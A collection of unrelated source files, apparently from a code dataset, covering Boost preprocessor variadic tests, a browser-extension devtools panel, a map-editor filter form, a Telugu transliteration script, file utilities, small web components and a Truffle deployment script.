# include <boost/preprocessor/config/limits.hpp>
# include <boost/preprocessor/variadic.hpp>
# include <boost/preprocessor/array/size.hpp>
# include <boost/preprocessor/array/elem.hpp>
# include <boost/preprocessor/list/at.hpp>
# include <boost/preprocessor/list/size.hpp>
# include <boost/preprocessor/seq/elem.hpp>
# include <boost/preprocessor/seq/size.hpp>
# include <boost/preprocessor/tuple/size.hpp>
# include <boost/preprocessor/tuple/elem.hpp>
# include <libs/preprocessor/test/test.h>
#define VDATA 0,1,2,3,4,5,6
#define VDATA_LARGE 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32
#define VDATA_VERY_LARGE 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63
#if BOOST_PP_VARIADIC_HAS_OPT()
#define VDATA_EMPTY
#endif
#if BOOST_PP_LIMIT_VARIADIC > 64
#define VDATA_LARGE_128 \
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, \
64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95
#define VDATA_VERY_LARGE_128 \
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, \
64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127
#endif
#if BOOST_PP_LIMIT_VARIADIC > 128
#define VDATA_LARGE_256 \
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, \
64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, \
128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138
#define VDATA_VERY_LARGE_256 \
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, \
64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, \
128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, \
192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255
#endif
BEGIN BOOST_PP_VARIADIC_ELEM(4,VDATA) == 4 END
BEGIN BOOST_PP_VARIADIC_ELEM(6,7,11,3,8,14,85,56,92,165) == 56 END
BEGIN BOOST_PP_VARIADIC_ELEM(29,VDATA_LARGE) == 29 END
BEGIN BOOST_PP_VARIADIC_ELEM(57,VDATA_VERY_LARGE) == 57 END
BEGIN BOOST_PP_VARIADIC_ELEM(35, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63) == 35 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA) == 7 END
BEGIN BOOST_PP_VARIADIC_SIZE(7,11,3,8,14,85,56,92,165) == 9 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_LARGE) == 33 END
BEGIN BOOST_PP_VARIADIC_SIZE(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32) == 33 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_VERY_LARGE) == 64 END
#if BOOST_PP_VARIADIC_HAS_OPT()
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_EMPTY) == 0 END
BEGIN BOOST_PP_VARIADIC_SIZE() == 0 END
#endif
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA)) == 7 END
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE)) == 64 END
BEGIN BOOST_PP_ARRAY_ELEM(4,BOOST_PP_VARIADIC_TO_ARRAY(7,11,3,8,14,85,56,92,165)) == 14 END
BEGIN BOOST_PP_ARRAY_ELEM(30,BOOST_PP_VARIADIC_TO_ARRAY(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32)) == 30 END
BEGIN BOOST_PP_LIST_AT(BOOST_PP_VARIADIC_TO_LIST(VDATA),3) == 3 END
BEGIN BOOST_PP_LIST_AT(BOOST_PP_VARIADIC_TO_LIST(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63),49) == 49 END
BEGIN BOOST_PP_LIST_SIZE(BOOST_PP_VARIADIC_TO_LIST(7,11,3,8,14,85,56,92,165)) == 9 END
BEGIN BOOST_PP_LIST_SIZE(BOOST_PP_VARIADIC_TO_LIST(VDATA_LARGE)) == 33 END
BEGIN BOOST_PP_SEQ_ELEM(5,BOOST_PP_VARIADIC_TO_SEQ(VDATA)) == 5 END
BEGIN BOOST_PP_SEQ_ELEM(16,BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE)) == 16 END
BEGIN BOOST_PP_SEQ_SIZE(BOOST_PP_VARIADIC_TO_SEQ(3,78,22,11,3)) == 5 END
BEGIN BOOST_PP_SEQ_SIZE(BOOST_PP_VARIADIC_TO_SEQ(VDATA_VERY_LARGE)) == 64 END
BEGIN BOOST_PP_TUPLE_SIZE(BOOST_PP_VARIADIC_TO_TUPLE(VDATA)) == 7 END
BEGIN BOOST_PP_TUPLE_SIZE(BOOST_PP_VARIADIC_TO_TUPLE(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63)) == 64 END
BEGIN BOOST_PP_TUPLE_ELEM(8,BOOST_PP_VARIADIC_TO_TUPLE(7,11,3,8,14,85,56,92,165)) == 165 END
BEGIN BOOST_PP_TUPLE_ELEM(27,BOOST_PP_VARIADIC_TO_TUPLE(VDATA_LARGE)) == 27 END
#if BOOST_PP_LIMIT_VARIADIC > 64
BEGIN BOOST_PP_VARIADIC_ELEM(47,VDATA_LARGE_128) == 47 END
BEGIN BOOST_PP_VARIADIC_ELEM(81,VDATA_LARGE_128) == 81 END
BEGIN BOOST_PP_VARIADIC_ELEM(29,VDATA_VERY_LARGE_128) == 29 END
BEGIN BOOST_PP_VARIADIC_ELEM(112,VDATA_VERY_LARGE_128) == 112 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_LARGE_128) == 96 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_VERY_LARGE_128) == 128 END
#if BOOST_PP_LIMIT_TUPLE > 64
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_LARGE_128)) == 96 END
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE_128)) == 128 END
BEGIN BOOST_PP_ARRAY_ELEM(83,BOOST_PP_VARIADIC_TO_ARRAY(VDATA_LARGE_128)) == 83 END
BEGIN BOOST_PP_ARRAY_ELEM(117,BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE_128)) == 117 END
#endif
BEGIN BOOST_PP_LIST_AT(BOOST_PP_VARIADIC_TO_LIST(VDATA_LARGE_128),79) == 79 END
BEGIN BOOST_PP_LIST_SIZE(BOOST_PP_VARIADIC_TO_LIST(VDATA_VERY_LARGE_128)) == 128 END
BEGIN BOOST_PP_SEQ_ELEM(113,BOOST_PP_VARIADIC_TO_SEQ(VDATA_VERY_LARGE_128)) == 113 END
BEGIN BOOST_PP_SEQ_ELEM(82,BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE_128)) == 82 END
BEGIN BOOST_PP_SEQ_SIZE(BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE_128)) == 96 END
#if BOOST_PP_LIMIT_TUPLE > 64
BEGIN BOOST_PP_TUPLE_SIZE(BOOST_PP_VARIADIC_TO_TUPLE(VDATA_VERY_LARGE_128)) == 128 END
BEGIN BOOST_PP_TUPLE_ELEM(77,BOOST_PP_VARIADIC_TO_TUPLE(VDATA_LARGE_128)) == 77 END
#endif
#endif
#if BOOST_PP_LIMIT_VARIADIC > 128
BEGIN BOOST_PP_VARIADIC_ELEM(47,VDATA_LARGE_256) == 47 END
BEGIN BOOST_PP_VARIADIC_ELEM(110,VDATA_LARGE_256) == 110 END
BEGIN BOOST_PP_VARIADIC_ELEM(135,VDATA_LARGE_256) == 135 END
BEGIN BOOST_PP_VARIADIC_ELEM(36,VDATA_VERY_LARGE_256) == 36 END
BEGIN BOOST_PP_VARIADIC_ELEM(95,VDATA_VERY_LARGE_256) == 95 END
BEGIN BOOST_PP_VARIADIC_ELEM(161,VDATA_VERY_LARGE_256) == 161 END
BEGIN BOOST_PP_VARIADIC_ELEM(217,VDATA_VERY_LARGE_256) == 217 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_LARGE_256) == 139 END
BEGIN BOOST_PP_VARIADIC_SIZE(VDATA_VERY_LARGE_256) == 256 END
#if BOOST_PP_LIMIT_TUPLE > 128
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_LARGE_256)) == 139 END
BEGIN BOOST_PP_ARRAY_SIZE(BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE_256)) == 256 END
BEGIN BOOST_PP_ARRAY_ELEM(133,BOOST_PP_VARIADIC_TO_ARRAY(VDATA_LARGE_256)) == 133 END
BEGIN BOOST_PP_ARRAY_ELEM(203,BOOST_PP_VARIADIC_TO_ARRAY(VDATA_VERY_LARGE_256)) == 203 END
#endif
BEGIN BOOST_PP_LIST_AT(BOOST_PP_VARIADIC_TO_LIST(VDATA_LARGE_256),137) == 137 END
BEGIN BOOST_PP_LIST_SIZE(BOOST_PP_VARIADIC_TO_LIST(VDATA_VERY_LARGE_256)) == 256 END
BEGIN BOOST_PP_SEQ_ELEM(212,BOOST_PP_VARIADIC_TO_SEQ(VDATA_VERY_LARGE_256)) == 212 END
BEGIN BOOST_PP_SEQ_ELEM(129,BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE_256)) == 129 END
BEGIN BOOST_PP_SEQ_SIZE(BOOST_PP_VARIADIC_TO_SEQ(VDATA_LARGE_256)) == 139 END
#if BOOST_PP_LIMIT_TUPLE > 128
BEGIN BOOST_PP_TUPLE_SIZE(BOOST_PP_VARIADIC_TO_TUPLE(VDATA_VERY_LARGE_256)) == 256 END
BEGIN BOOST_PP_TUPLE_ELEM(133,BOOST_PP_VARIADIC_TO_TUPLE(VDATA_LARGE_256)) == 133 END
#endif
#endif
|
<reponame>1Guardian/Opal-Browser<filename>gighmmpiobklfepjocnamgkkbiglidom/devtools.js
// This file is based on this similar ABP file:
// https://github.com/adblockplus/adblockpluschrome/blob/master/devtools.js
"use strict";
let panelWindow = null;
// Versions of Firefox before 54 do not support the devtools.panels API; on
// these platforms, even when the option is enabled, we cannot show the
// devtools panel.
if ("panels" in browser.devtools)
{
browser.runtime.sendMessage(
{
type: "prefs.get",
key: "show_devtools_panel"
}).then(enabled =>
{
if (enabled)
{
browser.devtools.panels.create(
"AdBlock",
"icons/ab-32.png",
"devtools-panel.html").then(panel =>
{
panel.onShown.addListener(window =>
{
panelWindow = window;
});
panel.onHidden.addListener(window =>
{
panelWindow = null;
});
if (panel.onSearch)
{
panel.onSearch.addListener((eventName, queryString) =>
{
if (panelWindow)
panelWindow.postMessage({type: eventName, queryString}, "*");
});
}
}
);
}
}
);
} |
// Package homedir detects the user's home directory without the use of cgo, for use in cross-compilation environments.
// +build darwin dragonfly freebsd js,wasm linux nacl netbsd openbsd solaris
package homedir
const homeEnv = "HOME"
|
<filename>lib/assets/javascripts/builder/editor/layers/layer-content-views/analyses/analysis-form-models/filter-form-model.js<gh_stars>0
var _ = require('underscore');
var BaseAnalysisFormModel = require('./base-analysis-form-model');
var template = require('./filter-form.tpl');
var ColumnData = require('builder/editor/layers/layer-content-views/analyses/column-data');
var ColumnRowData = require('builder/data/column-row-data');
var ColumnOptions = require('builder/editor/layers/layer-content-views/analyses/column-options');
var FILTER_TYPES = require('./filter-types');
var TYPE_TO_META_MAP = {};
FILTER_TYPES.map(function (d) {
TYPE_TO_META_MAP[d.type] = d;
});
var FILTER_RANGE_KINDS = [
{ val: 'between', label: _t('editor.layers.filter-options.between') },
{ val: 'is-equal-to', label: _t('editor.layers.filter-options.is-equal-to') },
{ val: 'is-greater-than', label: _t('editor.layers.filter-options.is-greater-than') },
{ val: 'is-greater-or-equal-than', label: _t('editor.layers.filter-options.is-greater-or-equal-than') },
{ val: 'is-less-than', label: _t('editor.layers.filter-options.is-less-than') },
{ val: 'is-less-or-equal-than', label: _t('editor.layers.filter-options.is-less-or-equal-than') }
];
var LESS_GREATER_KINDS = ['is-greater-or-equal-than', 'is-less-or-equal-than', 'is-less-than', 'is-less-than'];
module.exports = BaseAnalysisFormModel.extend({
defaults: {
accept_reject: 'accept'
},
parse: function (attrs) {
return _.defaults(
_.pick(attrs, 'id', 'source', 'column'), // maintain default attrs
this._typeDef(attrs.type).parse(attrs)
);
},
initialize: function () {
BaseAnalysisFormModel.prototype.initialize.apply(this, arguments);
this._nodeDefModel = this._layerDefinitionModel.findAnalysisDefinitionNodeModel(this.get('source'));
this._columnData = new ColumnData({
column: this.get('column'),
type: this._getSelectedColumnType()
}, {
nodeDefModel: this._nodeDefModel,
configModel: this._configModel
});
this._columnRowData = new ColumnRowData({
column: this.get('column')
}, {
nodeDefModel: this._nodeDefModel,
configModel: this._configModel
});
this._columnOptions = new ColumnOptions({}, {
configModel: this._configModel,
nodeDefModel: this._nodeDefModel
});
this.on('change:kind change:column', this._updateSchema, this);
this.on('change:histogram_stats', this._setSchema, this);
this.listenTo(this._columnOptions, 'columnsFetched', this._setSchema);
this.listenTo(this._columnRowData, 'columnsFetched', this._setSchema);
this.listenTo(this._columnData, 'columnsFetched', this._storeHistogramStats);
this._columnData.fetch();
this._columnRowData.fetch();
this._setSchema();
},
getTemplate: function () {
return template;
},
getTemplateData: function () {
return {
column: this.get('column'),
histogram_stats: this.get('histogram_stats'),
parametersDataFields: this._typeDef().getParameters(this.get('kind'), this.get('column'))
};
},
_formatAttrs: function (formAttrs) {
var column = this.get('column');
var customFormattedFormAttrs = this._typeDef().formatAttrs(formAttrs, column);
return BaseAnalysisFormModel.prototype._formatAttrs.call(this, customFormattedFormAttrs);
},
/**
* @override {BaseAnalysisFormModel.updateNodeDefinition}
*/
updateNodeDefinition: function (nodeDefModel) {
var attrs = this._formatAttrs(this.attributes);
nodeDefModel.clear({ silent: true });
nodeDefModel.set(attrs);
},
_getInputOptions: function () {
return _.map(this._columnRowData.getRows(), function (d) {
return { label: d, val: d };
});
},
_setSchema: function () {
var requiredValidators = [{
type: 'requiredBoolean'
}];
BaseAnalysisFormModel.prototype._setSchema.call(this, this._filterSchemaFieldsByType({
source: this._primarySourceSchemaItem(_t('editor.layers.analysis-form.input')),
column: {
type: 'Select',
text: _t('editor.layers.analysis-form.column'),
options: this._columnOptions.filterByType(['string', 'number', 'boolean']),
dialogMode: 'float',
validators: ['required']
},
kind: {
type: 'Select',
title: _t('editor.layers.analysis-form.filter'),
dialogMode: 'float',
options: this._getKindOptions(),
editorAttrs: {
showSearch: false
}
},
greater_than_or_equal: {
type: 'Text',
title: this._getMinOrEqualLabel(),
validators: ['required'],
editorAttrs: {
placeholder: _t('editor.layers.analysis-form.write-min-or-equal-value')
}
},
less_than_or_equal: {
type: 'Text',
title: this._getMaxOrEqualLabel(),
validators: ['required'],
editorAttrs: {
placeholder: _t('editor.layers.analysis-form.write-max-or-equal-value')
}
},
greater_than: {
type: 'Text',
title: this._getMinLabel(),
validators: ['required'],
editorAttrs: {
placeholder: _t('editor.layers.analysis-form.write-min-value')
}
},
less_than: {
type: 'Text',
title: this._getMaxLabel(),
validators: ['required'],
editorAttrs: {
placeholder: _t('editor.layers.analysis-form.write-max-value')
}
},
text: {
type: this._getInputType(),
title: _t('editor.layers.analysis-form.input'),
validators: this._isBoolean() ? requiredValidators : ['required'],
options: this._getInputOptions(),
dialogMode: 'float',
editorAttrs: {
column: 'column',
nodeDefModel: this._nodeDefModel,
configModel: this._configModel,
placeholder: _t('editor.layers.analysis-form.select-value')
}
},
accept_reject: {
type: 'Radio',
title: _t('editor.layers.analysis-form.result'),
options: [
{ label: _t('editor.layers.analysis-form.show'), val: 'accept' },
{ label: _t('editor.layers.analysis-form.hide'), val: 'reject' }
],
validators: ['required']
}
}));
this._generateHistogram();
this._generateHistogramStats();
},
_getInputType: function () {
var rows = this._columnRowData.getRows();
return rows && rows.length ? 'LazySelect' : 'Text';
},
_getMinOrEqualLabel: function () {
return _.contains(LESS_GREATER_KINDS, this.get('kind')) ? _t('editor.layers.analysis-form.value') : _t('editor.layers.analysis-form.min-or-equal');
},
_getMaxOrEqualLabel: function () {
return _.contains(LESS_GREATER_KINDS, this.get('kind')) ? _t('editor.layers.analysis-form.value') : _t('editor.layers.analysis-form.max-or-equal');
},
_getMinLabel: function () {
return _.contains(LESS_GREATER_KINDS, this.get('kind')) ? _t('editor.layers.analysis-form.value') : _t('editor.layers.analysis-form.min');
},
_getMaxLabel: function () {
return _.contains(LESS_GREATER_KINDS, this.get('kind')) ? _t('editor.layers.analysis-form.value') : _t('editor.layers.analysis-form.max');
},
_getSourceColumns: function () {
var nodeDefModel = this._layerDefinitionModel.findAnalysisDefinitionNodeModel(this.get('source'));
var sourceColumns = nodeDefModel.querySchemaModel.columnsCollection.map(function (columnModel) {
var columnName = columnModel.get('name');
return {
val: columnName,
label: columnName,
type: columnModel.get('type')
};
});
return sourceColumns;
},
_filterSchemaFieldsByType: function (schema) {
// Always include the source and column fields in addition to the type-specific fields
var kind = this.get('kind');
var column = this.get('column');
var fields = ['source', 'column'];
var parameters = this._typeDef().getParameters(kind, column);
if (parameters !== '') {
fields = fields.concat(parameters.split(','));
}
return _.pick(schema, fields);
},
_updateSchema: function () {
var columnType = this._getSelectedColumnType();
this._columnData.set({
column: this.get('column'),
type: columnType
});
this._columnRowData.set('column', this.get('column'));
this._setType();
this._setSchema();
},
_getSelectedColumnType: function () {
var columns = this._getSourceColumns();
var columnType = null;
for (var i in columns) {
if (columns[i]['label'] === this.get('column')) {
columnType = columns[i]['type'];
}
}
return columnType;
},
_getKindOptions: function () {
if (this.get('type') !== 'filter-category' || this.get('kind') === 'is-equal-to') {
return FILTER_RANGE_KINDS;
}
},
_setType: function () {
var columnType = this._getSelectedColumnType();
var kind = this.get('kind');
var attrs = {
type: 'filter-range'
};
if (columnType === 'number' && kind === 'is-equal-to') {
attrs.type = 'filter-category';
attrs.accept_reject = 'accept';
} else if (columnType === 'number') {
attrs.kind = this._typeDef(attrs.type).getKind(kind);
} else if (columnType === 'string') {
attrs.kind = null;
attrs.type = 'filter-category';
} else if (columnType === 'boolean') {
attrs.kind = 'is-boolean';
attrs.type = 'filter-category';
}
this.set(attrs);
},
_isBoolean: function () {
return this._getSelectedColumnType() === 'boolean';
},
_getColumnType: function (columnName) {
var nodeDefModel = this._layerDefinitionModel.findAnalysisDefinitionNodeModel(this.get('source'));
var column = nodeDefModel.querySchemaModel.columnsCollection.find(function (c) {
return c.get('name') === columnName;
}, this);
return column && column.get('type');
},
_generateHistogramStats: function (data) {
if (data) {
this.trigger('onColData', this);
}
},
_storeHistogramStats: function (data) {
if (data && this._getSelectedColumnType() === 'number') {
this.set('histogram_stats', data.attributes);
} else {
this.set('histogram_stats', null);
}
},
_generateHistogram: function () {
var type;
var tableName = this._getSourceOption()[0].layerName;
var columnName = this.get('column');
if (columnName) {
type = this._getColumnType(columnName);
}
if (tableName && columnName && type === 'number') {
this.trigger('generateHistogram', { columnName: columnName, tableName: tableName });
}
},
_typeDef: function (type) {
type = type || this.get('type');
return TYPE_TO_META_MAP[type];
}
});
|
# coding=utf-8
from __future__ import unicode_literals
import cmu
import devnagri
REVERSE_CONSONENTS = {
'ब': 'బ',
'भ': 'భ',
'ह': 'హ',
'ङ': 'ఙ',
'ग': 'గ',
'घ': 'ఘ',
'द': 'ద',
'ध': 'ధ',
'ज': 'జ',
'झ': 'ఝ',
'ड': 'డ',
'ढ': 'ఢ',
'प': 'ప',
'फ': 'ఫ',
'र': 'ర',
'ऱ': 'ఱ',
'क': 'క',
'ख': 'ఖ',
'त': 'త',
'थ': 'థ',
'च': 'చ',
'छ': 'ఛ',
'ट': 'ట',
'ठ': 'ఠ',
'म': 'మ',
'ण': 'ణ',
'न': 'న',
'ऩ': 'న',
'व': 'వ',
'ऴ': 'ళ',
'ल': 'ల',
'ळ': 'ళ',
'स': 'స',
'श': 'శ',
'ष': 'ష',
'य': 'య',
'य़': 'య',
}
CONSONENTS = dict((v, k) for k, v in REVERSE_CONSONENTS.items())
HALF_CONSONENTS = dict(t + '్' for t in CONSONENTS)
REVERSE_VOWELS = {
'अ': 'అ',
'आ': 'ఆ',
'इ': 'ఇ',
'ई': 'ఈ',
'उ': 'ఉ',
'ऊ': 'ఊ',
'ए': 'ఎ',
'ऐ': 'ఐ',
'ओ': 'ఓ',
'औ': 'ఔ',
'ऑ': 'ఆ',
}
VOWELS_MATRA = {
'అ': '',
'ఆ': 'ా',
'ఇ': 'ి',
'ఈ': 'ీ',
'ఉ': 'ు',
'ఊ': 'ూ',
'ఎ': 'ె',
'ఏ': 'ే',
'ఐ': 'ై',
'ఓ': 'ో',
'ఔ': 'ౌ',
'అం': 'ం',
'అః': 'ః',
}
REVERSE_VOWELS_MATRA = {
'': '',
'ा': 'ా',
'ि': 'ి',
'ी': 'ీ',
'ु': 'ు',
'ू': 'ూ',
'े': 'ె',
'ै': 'ై',
'ो': 'ొ',
'ौ': 'ౌ',
'ॉ': 'ా',
'ं': 'ం',
'ः': 'ః',
}
DIGITS = '౦౧౨౩౪౫౬౭౮౯'
REVERSE_MAPPING = REVERSE_CONSONENTS
REVERSE_MAPPING.update(REVERSE_VOWELS)
REVERSE_MAPPING.update(REVERSE_VOWELS_MATRA)
for i in range(10):
REVERSE_MAPPING[str(i)] = REVERSE_MAPPING[devnagri.DIGITS[i]] = DIGITS[i]
REVERSE_MAPPING['ऽ'] = 'ఽ'
REVERSE_MAPPING['्'] = '్'
def to_devnagri(text):
pass
def from_devnagri(text):
tel = []
for h in text:
tel.append(REVERSE_MAPPING.get(h, h))
return "".join(tel)
def is_vowel(l):
# print l, l in VOWELS
return l in VOWELS
def is_consonent(l):
# print l, l in CONSONENTS, l in HALF_CONSONENTS
return l in CONSONENTS or l in HALF_CONSONENTS
def add_vowel(c, v):
# print "add_vowel", c, v
if c in HALF_CONSONENTS:
c = c[:-1]
# print "add_vowel", c, v, c+VOWELS_MATRA.get(v, v)
return c+VOWELS_MATRA.get(v, v)
def trans_text(text):
return from_devnagri(cmu.trans_text(text, visual=False))
def main():
import sys
words = sys.argv[1:]
output = file("out.txt", "w")
for word in words:
tel = trans_text(word)
line = u"%s => %s\n" % (word, tel)
output.write(line.encode("utf-8"))
if __name__ == "__main__":
main()
|
<filename>parsers/base_parser.rb
class BaseParser
attr_accessor :options
def initialize(file)
self.options = {}
file.map { |line| parse_line(line.strip) }
end
private
def method_missing(name, *args, &block)
method_name = name.to_s
if self.options.has_key?(method_name)
self.options[method_name]
else
raise NoMethodError, "config #{method_name} not found"
end
end
def parse_line
raise 'not implemented'
end
end
|
<gh_stars>10-100
package util
import (
"fmt"
"io"
"os"
)
// UniqueNonEmptyElementsOf fetched from https://gist.github.com/johnwesonga/6301924
func UniqueNonEmptyElementsOf(s []string) []string {
unique := make(map[string]bool, len(s))
us := make([]string, len(unique))
for _, elem := range s {
if len(elem) != 0 {
if !unique[elem] {
us = append(us, elem)
unique[elem] = true
}
}
}
return us
}
// CopyFile fetched from https://opensource.com/article/18/6/copying-files-go
func CopyFile(src string, dst string) (int64, error) {
sourceFileStat, err := os.Stat(src)
if err != nil {
return 0, err
}
if !sourceFileStat.Mode().IsRegular() {
return 0, fmt.Errorf("%s is not a regular file", src)
}
source, err := os.Open(src)
if err != nil {
return 0, err
}
defer source.Close()
destination, err := os.Create(dst)
if err != nil {
return 0, err
}
defer destination.Close()
nBytes, err := io.Copy(destination, source)
return nBytes, err
}
|
resolve(route: ActivatedRouteSnapshot, state: RouterStateSnapshot): Observable<User> {
const userId = route.paramMap.get('id');
return this.userDataService.getUserById(userId).pipe(
catchError(error => {
this.router.navigate(['/error']); // Redirect to error page if data fetching fails
return of(null);
})
);
} |
const Greeting = ({ name }) => (
<div>
<h1>Hello {name}!</h1>
</div>
); |
import cv2
import numpy as np
def display_images_with_labels(imgs_file: str, lbls_file: str) -> None:
imgs = np.load(imgs_file)
lbls = np.load(lbls_file)
for i in range(imgs.shape[0]):
print(lbls[i])
cv2.imshow('img', imgs[i])
cv2.waitKey(0) # Wait for a key press to display the next image
cv2.destroyAllWindows() # Close all OpenCV windows after displaying all images
# Example usage
display_images_with_labels('test_set_ck_extended_no_resize.npy', 'test_labels_ck_extended_no_resize.npy') |
const BN = require('web3-utils').BN;
const {toWei} = require('web3-utils');
const {QualifyingGameSalePayoutWallet} = require('../src/constants');
const REVVSale = artifacts.require('REVVSale.sol');
const REVV = artifacts.require('REVV.sol');
const DeltaTimeInventory = artifacts.require('DeltaTimeInventory.sol');
module.exports = async (deployer, network, [owner]) => {
const revv = await REVV.deployed();
const inventory = await DeltaTimeInventory.deployed();
await deployer.deploy(REVVSale, revv.address, inventory.address, QualifyingGameSalePayoutWallet, {from: owner});
const sale = await REVVSale.deployed();
await revv.whitelistOperator(sale.address, true, {from: owner});
};
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.